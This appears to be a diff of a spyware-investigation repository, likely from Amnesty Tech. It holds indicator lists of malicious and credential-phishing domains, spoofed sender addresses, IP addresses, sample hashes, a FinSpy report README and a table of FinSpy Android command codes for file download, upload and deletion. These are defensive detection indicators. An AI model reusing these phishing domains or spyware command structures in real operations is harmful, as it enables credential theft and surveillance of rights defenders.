168 entertainmentinat.com 5.149.254.12
169 e-prokuror.info 5.102.145.72
170 e-sveiciens.com 5.149.254.14
171 eura-cell.com 88.150.227.98
172 eurasianupdate.com 88.150.227.110
173 eurosportnews.info 217.64.114.179
174 event-reg.info 185.77.131.10
175 ex-forexlive.com 5.102.147.73
176 extrahoney.net 77.245.76.109
177 ezdropshipping.net 23.107.197.107
178 fabric-shops.com 185.225.68.176
179 face-image.com 185.225.68.128
180 fadi7apress.com 5.102.145.26
181 fantastic-gardens.com 185.94.189.208
182 fashion-live.net 37.220.31.78
183 fashion-online.net 217.112.131.136
184 fashionpark.info 185.94.191.124
185 fastfixs.net 37.220.31.80
186 femmedaffaire.com 5.102.146.93
187 fiestamaghreb.com 188.215.229.216
188 files-downloads.com 217.61.96.219
189 findavoucher.online 185.198.58.196
190 findgoodfood.co 185.94.189.207
191 finditout-now.com 5.102.147.51
192 findmyass.org 8.39.147.100
193 findmyfriendsnow.com 179.43.169.41
194 findmylunch.org 38.132.118.116
195 findmymind.co 185.230.124.241
196 findmyplants.com 46.21.147.65
197 findouthere.org 83.221.132.104
198 fishingtrickz.com 185.244.150.68
199 fitness-for-ever.com 185.77.131.109
200 flights-report.com 217.112.131.42
201 flights-todays.com 88.150.227.103
202 flying-free.online 154.16.37.35
203 fofopiko.org 217.112.131.158
204 foodforyou.info 88.150.138.78
205 foodiez.online 46.183.221.187
206 foto-top.info 185.225.68.133
207 foudefoot.live 185.45.193.210
208 freedominfo.net 46.21.147.123
209 freelancers-team.org 5.102.147.106
210 free-local-events.info 185.225.68.207
211 freshandsoftbread.com 188.215.229.222
212 freshsaladtoday.com 200.7.97.254
213 fundum8430.com 163.172.140.159
214 funinat.com 46.21.147.46
215 funinthesun4u.com 185.198.58.144
216 funintheuk.com 185.117.75.228
217 funnytvclips.com 200.7.111.155
218 fwupdating.com 5.135.199.22
219 gadgetsshop.info 185.225.68.158
220 getagift.info 185.225.68.159
221 getoutofyourmind.com 5.149.254.18
222 getphotosinstant.net 5.102.147.51
223 glassesofwine.com 38.132.118.117
224 globalsupporteam.com 80.255.6.24
225 golf-news.live 167.88.5.222
226 goodcookingonline.com 5.102.146.90
227 goodflowersinside.com 37.220.31.19
228 good-games.org 80.255.3.111
229 goodthoughts4u.com 5.102.147.254
230 goroskop.co 5.149.255.19
231 gostatspro.com 81.17.30.45
232 go-trip.online 200.7.111.11
233 gulfca.net 88.150.227.115
234 gulf-financials.com 82.211.30.122
235 gulf-news.info 185.230.124.233
236 hairdresseraroundme.com 31.3.232.116
237 halal-place.com 89.249.65.234
238 handcreamforyou.com 185.81.113.105
239 handymanwood.com 77.73.65.47
240 happiness4us.com 5.149.254.20
241 hdsoccerstream.com 195.12.50.179
242 health-club.online 86.105.18.212
243 hellomydaddy.com 200.7.97.168
244 hellomymommy.com 200.7.97.167
245 highclassdining.net 109.200.24.58
246 holiday4u.work 5.102.146.184
247 homeishere.co 31.3.232.126
248 homemadecandies.net 195.12.50.177
249 host-one-more.com 185.156.173.70
250 hotelsauto.co 185.198.57.144
251 hotels-review.org 217.112.131.90
252 hotelstax.co 188.215.229.205
253 hotelsurvey.info 185.225.68.205
254 hothdwallpaperz.com 5.102.145.37
255 hotinfosource.com 217.112.131.111
256 hot-motors.com 185.117.89.231
257 housesfurniture.com 185.94.192.106
258 housing-update.com 88.150.227.117
259 howisurday.com 185.198.58.195
260 howtoexplorebirds.com 88.150.227.99
261 howtomakeavocadotoastandegg.com 84.38.129.195
262 hracingtips.com 185.117.89.220
263 icecreamlovesme.com 155.94.160.126
264 igiheonline.com 5.102.147.250
265 ilovemybeatifulnails.com 109.200.24.10
266 ilovemymilf.com 5.102.146.72
267 income-tax.online 103.199.16.153
268 indrive.info 185.225.68.141
269 ineediscounts.com 185.117.72.113
270 info24.live 185.141.27.116
271 infospotpro.com 217.112.131.20
272 infospress.com 5.102.146.241
273 insta-foto.net 185.141.26.39
274 internetmobilespeed.com 91.219.238.77
275 intim-media.net 185.225.68.126
276 investigationews.com 185.82.200.187
277 in-weather.com 103.199.17.206
278 islamic-news-today.com 103.199.16.88
279 islamiyaat.com 89.249.65.146
280 islam-today.info 185.198.58.151
281 islam-world.net 200.7.97.242
282 istgr-foto.com 185.225.68.131
283 iwantitallnow.com 173.254.248.105
284 jaimelire.net 185.183.97.196
285 just-one-left.com 46.21.147.14
286 karbalaeyat.com 191.101.31.29
287 kaspi-payment.com 185.94.191.114
288 keyindoors.com 66.85.157.84
289 kingdom-deals.com 200.7.97.212
290 kingdom-news.com 191.101.31.118
291 klientuserviss.com 185.198.58.178
292 koramaghreb.com 188.215.229.214
293 kurjerserviss.com 185.198.58.177
294 labonneforme.net 185.183.97.194
295 leadersnews.org 5.102.147.105
296 leggingsjustforyou.com 5.149.250.18
297 legyelvodas.com 185.117.89.252
298 legyelvodas.com 80.211.254.70
299 legyelvodas.net 185.117.89.253
300 leleader.org 185.106.120.35
301 leprotestant.com 185.106.120.34
302 lesbonnesaffaires.online 5.102.146.123
303 lesportail.biz 185.117.75.165
304 liam-ryan.co 185.141.26.49
305 lifedonor.net 88.150.138.111
306 like-the-rest.com 185.225.68.68
307 live-once.net 185.183.97.117
308 loading-images.com 5.102.147.172
309 loading-pag.net 8.28.175.73
310 localgreenflowers.com 185.225.68.198
311 loisiragogo.com 5.102.146.128
312 lonely-place.com 5.102.146.116
313 looking-for-two.com 5.102.145.8
314 lookitupnow.website 185.81.113.81
315 look-outsidenow.com 89.33.246.113
316 loschismescalientes.com 149.255.35.106
317 losnegocios.biz 23.227.207.174
318 lost-n-found.net 185.183.96.140
319 loveandhatenow.com 5.102.147.219
320 maghrebfoot.com 185.117.75.169
321 maghrebfunny.biz 185.94.189.214
322 mamba-live.com 217.112.131.106
323 mapupdatezone.com 185.193.38.159
324 massagetax.co 5.102.145.98
325 maymknch2026.co 188.215.229.212
326 medical-updates.com 185.77.129.103
327 megacenter.info 217.112.131.95
328 mercedesbenz-vip.com 185.77.131.103
329 mideast-today.com 88.119.179.176
330 miles-club.com 217.112.131.91
331 miralo-rapidamente.com 46.21.150.144
332 mobile-softs.com 5.149.255.18
333 mobile-update.online 185.198.57.43
334 mobile-updates.info 217.112.131.61
335 mobileweatherweb.com 185.44.105.35
336 mobi-up.net 81.92.202.215
337 moh-followup.com 88.150.227.118
338 moh-online.com 109.200.24.71
339 mondaymornings.co 176.223.111.231
340 moneycoincurrency.com 185.225.68.201
341 moneydigitalcurrency.com 185.225.68.200
342 moneyxchanges.com 109.200.24.19
343 mosque-salah.com 109.200.24.64
344 mosque-salah.net 185.225.68.5
345 mosquesfinder.com 194.187.249.106
346 motordeal.info 88.150.227.104
347 movie-tickets.online 103.199.16.11
348 moyfoto.net 185.141.26.18
349 m-resume.com 185.225.68.135
350 muftyat.com 217.112.131.16
351 muslim-world.info 200.7.97.215
352 muzicclips.com 200.7.97.248
353 mybrightidea.co 185.117.72.10
354 mydailycooking.net 89.249.65.138
355 myfiles.photos 130.185.250.199
356 myfreecharge.online 103.199.16.111
357 mygreathat.com 109.200.24.126
358 mykaspi.com 217.112.131.39
359 mylovelypet.net 62.113.232.197
360 mymobile-cell.com 217.61.4.34
361 mypostservice.online 192.52.243.110
362 my-privacy.co 103.199.16.15
363 mysadaga.com 31.3.232.108
364 myshoesforever.com 185.225.68.177
365 myshop4u.net 77.73.65.210
366 mystulchik.com 5.102.145.14
367 mysuperheadphones.co 179.43.169.8
368 mysuperheadphones.co 52.54.37.95
369 myukadventures.com 185.94.189.204
370 nation24.info 5.102.147.235
371 nationalleagues.net 5.102.146.124
372 nbrowser.org 109.200.24.102
373 newandfresh.com 185.82.202.29
374 newandroidapps.net 185.181.10.64
375 newarrivals.club 185.109.168.12
376 newarrivals.club 88.119.179.102
377 newcooking.org 109.200.24.11
378 newdailycoupons.com 88.150.227.77
379 newmodel.online 185.109.168.18
380 newmodel.online 88.119.179.168
381 newnhotapps.com 217.112.131.137
382 news-alert.org 200.7.111.124
383 newscurrent.info 185.134.29.144
384 newsdirect.online 185.243.112.77
385 news-gazette.info 88.119.179.164
386 newsofficial.info 87.121.98.39
387 newsofgames.com 154.16.37.11
388 newsofthemoment.net 38.132.118.114
389 newworld-news.com 89.40.181.124
390 nightevents.info 185.225.68.206
391 noextramoney.com 192.161.48.122
392 noloveforyou.com 38.132.114.168
393 nomorewarnow.com 185.198.58.143
394 noonstore.sale 130.185.250.201
395 noor-alhedaya.com 89.249.65.149
396 normal-brain.com 103.199.16.12
397 nosalternatives.com 185.141.27.123
398 nothernkivu.com 89.40.181.125
399 noti-global.com 38.84.132.168
400 noti-hot.com 8.28.175.78
401 notresante-infos.com 5.102.145.169
402 nouveau-president.com 185.106.120.246
403 nouvelles247.com 200.7.97.213
404 novosti247.com 109.200.24.32
405 nuevaidea.co 173.254.248.115
406 odnoklass-profile.com 185.225.68.132
407 offresimmobilier.com 5.102.145.12
408 ok-group.org 185.225.68.134
409 one-isnot-enough.com 5.102.147.13
410 onetreeinheaven.com 37.220.31.107
411 online-dailynews.com 88.150.227.125
412 onlinefreework.com 200.7.105.39
413 onlineshopzm.com 185.225.68.60
414 onlygossip.info 185.117.89.198
415 only-news.net 5.102.147.162
416 onlytoday.biz 109.200.24.104
417 onthegoodtime.com 185.225.68.69
418 operatingnews.com 46.21.147.173
419 orange-updates.com 5.104.105.200
420 ourorder.info 185.225.68.127
421 outletsaroundme.com 78.142.25.37
422 outletstore.tech 87.121.98.38
423 papers2go.co 176.223.111.206
424 park4free.info 185.144.83.116
425 passwd.privo7799add.net 188.40.155.240
426 pastesbin.com 185.195.200.56
427 pathtogo.net 5.149.255.3
428 pay-city.com 154.16.37.105
429 paynfly.info 185.144.83.114
430 paywithcrytpo.com 200.7.111.154
431 phonering4you.com 5.149.250.19
432 photo-my.net 5.149.255.16
433 pickcard.info 5.102.147.138
434 picture4us.com 46.183.221.149
435 pi.license-updater.com 91.219.28.21
436 pine-sales.com 92.222.208.251
437 pizzatoyourplace.com 5.149.249.19
438 playwithusonline.com 200.7.111.102
439 pochta-info.com 185.29.11.203
440 politica504.com 149.255.36.132
441 politicalpress.org 5.102.145.99
442 politiques-infos.info 5.102.145.17
443 postainf.net 200.7.98.117
444 posta.news 185.29.11.200
445 ppcisdead.com 88.150.189.121
446 prikol-girls.com 5.149.249.189
447 promosdereve.com 88.119.179.105
448 promotionlove.co 185.117.75.165
449 promotionlove.co 185.94.192.101
450 puffyteddybear.com 84.38.130.107
451 purple-enveloppe.com 66.85.157.71
452 quitmyjob.xyz 103.199.16.47
453 quran-quote.com 84.200.32.211
454 rainingcats.net 38.132.118.110
455 readingbooksnow.com 109.200.24.7
456 regionews.net 5.102.145.90
457 reklamas.info 5.149.254.2
458 rentmotors.net 88.150.138.99
459 research-archive.com 5.102.146.59
460 reseausocialsolutions.co 185.82.200.143
461 reservationszone.com 88.150.138.85
462 reseufun.com 188.215.229.215
463 resolutionsbox.com 38.132.118.107
464 restaurantsstar.com 185.225.68.75
465 rewards-club.info 176.223.111.137
466 rockmusic4u.com 185.82.200.164
467 rockstarpony.com 94.177.234.8
468 rosegoldjewerly.com 185.195.200.44
469 rosesforus.com 88.150.189.111
470 russian4u.net 95.213.193.40
471 saladsaroundme.com 89.33.246.119
472 same-old.net 37.220.31.46
473 savemoretime.co 185.225.68.64
474 saveurday.net 37.72.175.179
475 securesmsing.com 109.200.24.14
476 sergek.info 185.195.200.46
477 services-sync.com 46.21.147.237
478 service-update.online 185.94.191.59
479 shia-voice.com 52.54.37.95
480 shia-voice.com 89.249.65.148
481 shoppingdailydeals.net 109.200.24.18
482 shortfb.com 37.220.31.108
483 shuturl.com 185.117.72.117
484 signpetition.co 200.7.111.125
485 site-redirecting.com 109.200.24.20
486 smarttarfi.com 45.76.42.111
487 snoweverywhere.com 46.21.147.21
488 soccerstreamingstars.com 185.183.96.131
489 social-life.info 185.183.96.131
490 somuchrain.com 5.102.145.39
491 so-this-is.com 159.89.193.231
492 specialgifts4all.com 200.7.97.225
493 sportupdates.info 185.225.68.86
494 sportupdates.online 89.33.246.118
495 sputnik-news.info 185.198.58.182
496 starbuckscoffeeweb.com 217.112.131.109
497 stars4sale.co 185.225.68.65
498 start2playnow.com 5.102.145.248
499 starting-from0.com 185.94.189.219
500 statisticsdb.net 185.93.183.231
501 stopmysms.com 191.101.31.222
502 stopsms.biz 185.198.58.154
503 sunday-deals.com 88.119.179.169
504 supportonline4me.com 185.80.53.199
505 surprising-sites.com 217.112.131.67
506 sync-cdn.com 185.183.96.150
507 syncmap.org 185.117.89.145
508 tablereservation.info 109.200.24.66
509 takethat.co 209.250.247.96
510 tastyteaflavors.com 5.149.248.27
511 telecom-info.com 185.225.68.61
512 tengrinews.co 81.95.5.168
513 theastafrican.com 185.156.173.104
514 thebestclassicalmusic.net 217.64.113.250
515 thecoffeeilove.com 185.225.68.199
516 thehighesttemple.com 185.183.107.49
517 thehoteloffers.com 185.225.68.203
518 the-only-way-out.com 185.230.124.228
519 theshopclub.org 185.225.68.160
520 thespaclub.net 88.150.138.83
521 theway2get.com 88.119.179.156
522 ticket-aviata.info 185.94.191.14
523 tiketon.info 185.94.191.120
524 tlgr-me.org 185.225.68.130
525 tobepure.com 88.119.179.205
526 tommyfame.com 77.245.76.110
527 top100vidz.com 62.113.232.207
528 top10gifts4men.com 5.102.145.180
529 top10leadsgen.com 200.7.97.230
530 topbraingames4u.com 185.183.96.169
531 topten-news.info 185.94.191.67
532 touristvaca.com 185.198.57.200
533 tradeexchanging.com 81.95.5.164
534 traffic-pay.com 88.150.227.119
535 traffic-updates.info 217.112.131.156
536 travel-foryou.online 5.102.145.113
537 travelight.online 81.95.5.147
538 traveltogether.link 5.102.147.114
539 tricksinswiss.com 89.238.138.136
540 trililihihi.com 5.102.145.14
541 t-support.net 109.200.24.15
542 turismo-aqui.com 38.84.132.172
543 tvshowcusting.com 31.184.198.150
544 un-limitededitions.com 185.225.68.97
545 unsubscribed.co 191.101.31.213
546 untoldinfo.net 5.102.147.41
547 updateapps.net 80.255.3.107
548 upgrade-sim-card.com 217.112.131.150
549 upload-now.net 88.150.227.116
550 uptownfun.co 46.246.1.12
551 urbestfriends.com 77.73.65.199
552 url-redirect.com 66.172.10.189
553 urlsync.com 185.141.25.210
554 urspanishteacher.net 95.213.188.35
555 vanillaandcream.com 77.245.76.113
556 vastdealsnow.com 191.101.31.214
557 verify-app.online 185.82.202.42
558 videosdownload.co 5.102.146.66
559 vider-image.com 185.225.68.123
560 viedechretien.org 5.102.145.122
561 vie-en-islam.com 5.102.147.234
562 viewhdvideos.com 200.7.111.118
563 vipmasajes.com 38.84.132.174
564 viva-droid.com 5.102.146.64
565 vivrechezsoi.info 5.102.147.236
566 vkan-profile.com 185.225.68.129
567 volcanosregion.com 5.102.146.85
568 waffleswithnutella.com 66.85.157.83
569 watersport4u.net 77.73.68.160
570 weather4free.com 88.119.179.134
571 weatherapi.co 206.189.51.151
572 web-config.org 109.200.24.121
573 websites4yourhost.com 185.234.73.10
574 web-viewer.online 217.112.131.189
575 welovebigcakes.com 185.117.75.82
576 welovelollipops.com 185.45.192.144
577 welovemorningcoffees.com 179.43.169.36
578 wewantflowersnow.com 185.225.68.3
579 whatcanidowithbirds.com 88.150.189.106
580 whats-new.org 46.22.223.252
581 whereismybonus.com 5.149.252.241
582 whereismyhand.com 38.132.114.167
583 whereisthehat.com 8.28.175.71
584 windyone.net 200.7.105.24
585 wintertimes.co 46.246.1.14
586 wonderfulinsights.com 217.112.131.207
587 woodhome4u.com 77.73.65.48
588 xchange4u.net 185.183.107.44
589 xchangerates247.net 185.183.96.139
590 xn--nissn-3jc.com 89.238.132.249
591 xn--noki-t5b.com 86.105.18.11
592 xn--telegrm-qbd.com 185.225.68.136
593 xtremelivesupport.com 5.102.146.237
594 youcantpass.com 37.220.31.28
595 yourbestclothes.com 46.21.147.197
596 yourbestefforts.com 46.21.147.196
597 yourbestvaca.com 104.216.8.38
598 yourgreatestsmartphone.com 88.150.227.83
599 yourhotelreservation.info 185.225.68.204
600 yummyfoodallover.com 37.72.175.143
601 zednewszm.com 217.64.113.251
602 zm-banks.com 217.64.113.252
603 zm-banks.com 89.43.60.103
604 zm-weather.com 89.43.60.103
605 zsports-info.com 89.43.60.104

View File

@@ -0,0 +1,216 @@
account-facebook.com
account-mysecure.com
account-privacy.com
account-privcay.com
account-servics.com
account-servicse.com
accounts-mysecure.com
accounts-mysecures.com
accounts-secuirty.com
accounts-securtiy.com
accounts-servicse.com
accounts-settings.com
alert-newmail02.pro
application-secure.com
applications-secure.com
applications-security.com
authorize-myaccount.com
blu142-live.com
blu160-live.com
blu162-live.com
blu165-live.com
blu167-live.com
blu175-live.com
blu176-live.com
blu178-live.com
blu179-live.com
blu187-live.com
browser-checked.com
browsering-check.com
browsering-checked.com
browsers-checked.com
browser-secures.com
browsers-secure.com
browsers-secures.com
bul174-live.com
check-activities.com
check-browser.com
check-browsering.com
check-browsers.com
checking-browser.com
connected-myaccount.com
connect-myaccount.com
data-center17.website
documents-view.com
documents-viewer.com
document-viewer.com
go2myprofile.info
go2profiles.info
googledriveservice.com
gotolinks.top
goto-newmail01.pro
idmsa-login.com
inbox01-email.pro
inbox01-gomail.com
inbox01-mails.icu
inbox01-mails.pro
inbox02-accounts.pro
inbox02-mails.icu
inbox02-mails.pro
inbox03-accounts.pro
inbox03-mails.icu
inbox03-mails.pro
inbox04-accounts.pro
inbox04-mails.icu
inbox04-mails.pro
inbox05-accounts.pro
inbox05-mails.icu
inbox05-mails.pro
inbox06-accounts.pro
inbox06-mails.pro
inbox07-accounts.pro
inbox101-account.com
inbox101-accounts.com
inbox101-accounts.info
inbox101-accounts.pro
inbox101-live.com
inbox102-account.com
inbox102-live.com
inbox102-mail.pro
inbox103-account.com
inbox103-mail.pro
inbox104-accounts.pro
inbox105-accounts.pro
inbox106-accounts.pro
inbox107-accounts.pro
inbox108-accounts.pro
inbox109-accounts.pro
inbox169-live.com
inbox171-live.com
inbox171-live.pro
inbox172-live.com
inbox173-live.com
inbox174-live.com
inbox-live.com
inbox-mail01.pro
inbox-mail02.pro
inbox-myaccount.com
mail01-inbox.pro
mail02-inbox.com
mail02-inbox.pro
mail03-inbox.com
mail03-inbox.pro
mail04-inbox.com
mail04-inbox.pro
mail05-inbox.pro
mail06-inbox.pro
mail07-inbox.pro
mail08-inbox.pro
mail09-inbox.pro
mail101-inbox.com
mail101-inbox.pro
mail103-inbox.com
mail103-inbox.pro
mail104-inbox.com
mail104-inbox.pro
mail105-inbox.com
mail105-inbox.pro
mail106-inbox.pro
mail107-inbox.pro
mail108-inbox.pro
mail109-inbox.pro
mail10-inbox.pro
mail110-inbox.pro
mail12-inbox.pro
mail13-inbox.pro
mail14-inbox.pro
mail15-inbox.pro
mail16-inbox.pro
mail17-inbox.pro
mail18-inbox.pro
mail19-inbox.pro
mail201-inbox.pro
mail20-inbox.pro
mail21-inbox.pro
mail-inbox.pro
mailings-noreply.pro
myaccountes-setting.com
myaccountes-settings.com
myaccount-inbox.pro
myaccount-logins.com
myaccount-redirects.com
myaccount-setting.com
myaccount-settinges.com
myaccount-setup1.com
myaccount-setup.com
myaccount-setups.com
myaccounts-login.com
myaccounts-profile.com
myaccounts-secuirty.com
myaccounts-secures.com
myaccounts-settings.com
myaccounts-settinq.com
myaccounts-settinqes.com
myaccounts-transfer.com
myaccount-transfer.com
myaccount.verification-approve.com
myaccount.verification-approves.com
myaccuont-settings.com
mysecure-account.com
mysecure-accounts.com
mysecures-accounts.com
newinbox01-accounts.pro
newinbox01-mails.pro
newinbox02-accounts.pro
newinbox03-accounts.pro
newinbox05-accounts.pro
newinbox06-accounts.pro
newinbox07-accounts.pro
newinbox08-accounts.pro
newinbox-account.info
newinbox-accounts.pro
noreply.ac
noreply-accounts.site
noreply-mailer.pro
noreply-mailers.com
noreply-mailers.pro
noreply-myaccount.com
privacy-myaccount.com
privcay-setting.com
profile-settings.com
protonemail.ch
recovery-settings.info
redirection-login.com
redirection-logins.com
redirections-login.com
redirections-login.info
redirects-myaccount.com
royalk-uae.com
secure-browsre.com
secures-applications.com
secures-browser.com
secure-settinqes.com
secures-inbox.com
secures-inbox.info
securesmails-alerts.pro
secures-settinqes.com
secures-transfer.com
secures-transfers.com
security-settinges.com
securtiy-settings.com
services-securtiy.com
setting-privcay.com
settings-secuity.com
settinq-myaccounts.com
settinqs-myaccount.com
thx-me.website
transfer-click.com
transfer-clicks.com
truecaller.services
tutanota.org
urllink.xyz
verification-approve.com
verification-approves.com
verifications-approve.com
xn--mxamya0a.ccn
yahoo.llc

View File

@@ -0,0 +1,34 @@
account-login.site
adminmail.online
email-secure.online
login-acc.email
login-network.space
login-service.email
login-service.online
m4r3zb2ci0-noreply.pw
mail-log.pw
mail-secure.online
mail-secure.tech
mail-verify.live
maillogin.pw
mailverify.live
my-mail-inbox.com
redirect-secure.pw
safebrowsing.website
secure-accounts.online
secure-conn.pw
secure-email.site
secure-emails.online
secure-login.services
service-login.online
signin-aouth2.pw
signin-verify.pw
user-members.pro
verify-mail.pro
verifymail.live
vers.pw
weblive.pw
whatsuppweb.me
wi-fi.email
www.secure-email.site
xbz.pw

View File

@@ -0,0 +1,5 @@
accounts@m4r3zb2ci0-noreply.pw
noreply-team.googelsupport@verify-mail.pro
secuirty.center.google.accounts@m4r3zb2ci0-noreply.pw
support-team@m4r3zb2ci0-noreply.pw
mails@m4r3zb2ci0-noreply.pw

View File

@@ -0,0 +1,3 @@
srf-goolge.site
gmailusercontent.site
protect-outlook.com

View File

@@ -0,0 +1,15 @@
admin@microsoftstore.com
google.com@localhost
google@script
noreply750@mailgoogle.ccm
noreply@gmailusercontent.site
noreply@mailgoogle.ccm
googlecommunityteam-noreply@srf-goolge.site
noreply-accounts@goolge.cm
noreply@accounts-goolge.com
noreply@accounts-goolgeemail.site
accounts-noreply@google.ccm
noreply-accounts@google.ccm
alerts@valabs.info
google@noreply-accounts.com
no-reply@goolge.email

View File

@@ -0,0 +1,9 @@
stopsms.biz
revolution-news.co
videosdownload.co
infospress.com
business-today.info
hmizat.co
free247downloads.com
bun54l2b67.get1tn0w.free247downloads.com

View File

@@ -0,0 +1,71 @@
acccountsgoog1e.com
account-mail.info
accountapp.xyz
accountsgoog1e.com
alexandr01299.xyz
auth-google.site
auth-mail.email
badoo-account-security.com
chrome-redirect.top
com-auth.site
com-enter.site
com-gm.site
com-google.site
check-activity.com.ru
comericac.com
desktest1.xyz
desktest5.xyz
desktest9.xyz
dokerest.xyz
dokertest.xyz
droinjoin.xyz
emails-support.site
fedortest.xyz
freekremlin.com
frosdank.com
frostdank.com
garant-help.com
gmail-warning.top
google-activity.pw
gvoice8765.online
hpphhpph.com
id-support-email.com
joindroin.xyz
lamatrest.xyz
mail-auth.email
mail-auth.online
mail-google.email
my-short.com
myaccount-support.top
mycabinet.xyz
mynavvfedera1.org
mynavyfedera1.org
mynavyfedral.org
mynevyfedera1.org
navyfedara1.org
navyfedera1.com
navyfedera1.org
navyfederai.org
nayfedera1.org
nevyfedera1.org
nitroqensports.eu
nsdns.xyz
poxypoxy.xyz
rc-room.com
support-emails.host
t1bank.xyz
testdhome1.xyz
testdhome4.xyz
testdom1.xyz
testdom3.xyz
testfor7.xyz
vkontak1e.com
voice98765.online
xn--avyfedera-yubm.org
xn--bckchain-v3a30f.com
xn--blckchain-17c.com
xn--blockcain-lmb.com
xn--mynavyfedera-occ.org
xn--navyfderal-36a.com
xn--navyfedera-j0b.org
yandex-account-security.com

View File

@@ -0,0 +1,22 @@
51.15.100.189
51.15.114.133
51.15.134.115
51.15.253.174
51.15.116.52
212.47.244.155
167.99.208.115
142.93.219.124
51.158.108.37
51.158.168.110
51.83.97.40
134.209.86.7
68.183.66.192
167.71.93.148
134.209.193.198
217.61.0.148
165.227.153.226
68.183.49.14
45.86.65.167
208.68.39.124
51.254.221.192
217.61.17.175

View File

@@ -0,0 +1,3 @@
279c70f2da2c361b62353bdaa388372adc14929b3be83571b1347d890fd6279c
902c5f46ac101b6f30032d4c5c86ecec115add3605fb0d66057130b6e11c57e6
ba1990b5e38191512718180d0de1ad2123e18330449b8c12877c4db60aeb05e4

View File

@@ -0,0 +1,3 @@
# India: Human Rights Defenders Targeted by a Coordinated Spyware Operation
Indicators of the report [India: Human Rights Defenders Targeted by a Coordinated Spyware Operation](https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/)

View File

@@ -0,0 +1,3 @@
researchplanet.zapto.org
socialstatistics.zapto.org
duniaenewsportal.ddns.net

View File

@@ -0,0 +1,5 @@
jagdish.meshraam@gmail.com
drsnehapatil64@gmail.com
sinhamuskaan04@gmail.com
jennifergonzales789@gmail.com
payalshastri79@gmail.com

View File

@@ -0,0 +1,5 @@
185.82.202.155
185.117.66.188
185.117.74.47
185.117.74.28
185.45.193.14

View File

@@ -0,0 +1,12 @@
e3dea449bf74434ee1c9cdc04ca68b8f3c9bac357768e07df303433f257d3b9a
21d24e08889f75461a7ce6f21fc612a701bca35da1a218cf3cdd6e23f613bb4d
16b5c74fb55f52ae0ae4328f65b2bf3bbe3e5ee34268c1d32a247a0a1dfa3186
5a4aca57541954195953066a4be96dfb19776ba099d72f8f1d3677581594606e
11cef331557eb693e718d27b6a7211a98d3982117a03ec1491db8098ea3cec00
88b92d985b7d616c93c391731c1e4a6d3c8323fdcbf31cfc4d340e27253913a7
b1b6e133aa320669c772ec7e5fd6fbe4cb3edca13ad5351f14df3c1f13939d09
ea5f37e1feab670171963aa83b235c772202b2d4bb7289dd45302c3851dbd6f9
de302a61e5f07b0e65753355d44d22181a2742ac3a92aa058bdcd00cc4dab788
b09ca9d48a0455ed5e02a56aabeb397c41fb63320244719749e0741da72e79c4
095ec879f323a0a3eceb97013125880d49ac701eef568e3b010fdddb1333941f
ac4d5d938009fd44b2f7587986862ab2278887a17d32f748278445b625b3efd9

View File

@@ -0,0 +1,25 @@
# Technical Report
This repository contains indicators of compromise and scripts related to the report [German-made FinSpy spyware found in Egypt, and Mac and Linux versions revealed ](https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/) published by Amnesty Tech in September 2020.
Indicators:
* `domains.txt` : domains identified
* `ips.txt` : IPv4 addresses identified
* `sha256.csv` : sha256 of samples identified
* `rules.yar` : Yara rules
Tools in the script folder:
* `decode_modules.py` : decode encrypted modules of Linux and MacOs
* `read_config.py` : read FinSpy configuration
* `android/extract_config.py` : extract configuration from FinSpy Android samples
* `android/java_parser.py` : extract obfuscated strings from decompiled java code
* `android/string_decoder.py` : decode obfuscated strings
* `linux/extract_config.py` : extract configuration files from a Linux FinSpy installer
* `cobaltstrike/cobaltstrike_config.py`: extract the configuration of a Cobalt Strike payload
* `cobaltstrike/cobaltstrike_decode.py`: decode an obfuscated Cobalt Strike payload
Additional files:
* `android_tlv_list.csv` : list of TLV values extracted from the Android sample

View File

@@ -0,0 +1,813 @@
Group ID,Group name,TLV value,Known TLV,TLV name,Function
64,drives all get,131488,,TlvTypeGetAllDrivesRequest,
64,drives all get,131744,,TlvTypeGetAllDrivesReply,
66,contents folder get,135328,,TlvTypeGetFolderContentsRequest,
66,contents folder get,135584,,TlvTypeGetFolderContentsReply,
66,contents folder get,135840,,TlvTypeGetFolderContentsNext,
66,contents folder get,136096,,TlvTypeGetFolderContentsEnd,
68,download file,139424,,TlvTypeDownloadFileRequest,
68,download file,139680,,TlvTypeCancelDownloadFileRequest,
68,download file,139936,,TlvTypeDownloadFileReply,
68,download file,140192,,TlvTypeDownloadFileNext,
68,download file,140448,,TlvTypeDownloadFileEnd,
68,download file,140704,,TlvTypeCancelDownloadFileReply,
70,upload file,143520,,TlvTypeUploadFileRequest,
70,upload file,143776,,TlvTypeCancelUploadFileRequest,
70,upload file,144032,,TlvTypeUploadFileReply,
70,upload file,144288,,TlvTypeUploadFileNext,
70,upload file,144544,,TlvTypeUploadFileEnd,
70,upload file,144800,,TlvTypeUploadFileCompleted,
70,upload file,145056,,TlvTypeCancelUploadFileReply,
72,delete file,147616,,TlvTypeDeleteFileRequest,
72,delete file,147872,,TlvTypeDeleteFileReply,
74,search file,151968,,TlvTypeSearchFileRequest,
74,search file,152224,,TlvTypeSearchFileReply,
74,search file,152480,,TlvTypeSearchFileNext,
74,search file,152736,,TlvTypeSearchFileEnd,
74,search file,152992,,TlvTypeCancelSearchFileRequest,
74,search file,153248,,TlvTypeCancelSearchFileReply,
78,fs,159888,,TlvTypeFSFileDataChunk,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/d, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c"
78,fs,160128,,TlvTypeFSDiskDrive,Lorg/xmlpush/v3/o/e
78,fs,160384,,TlvTypeFSFullPath,"Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/f/b, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c"
78,fs,160640,,TlvTypeFSFilename,"Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, L/org/xmlpush/v3/h/c"
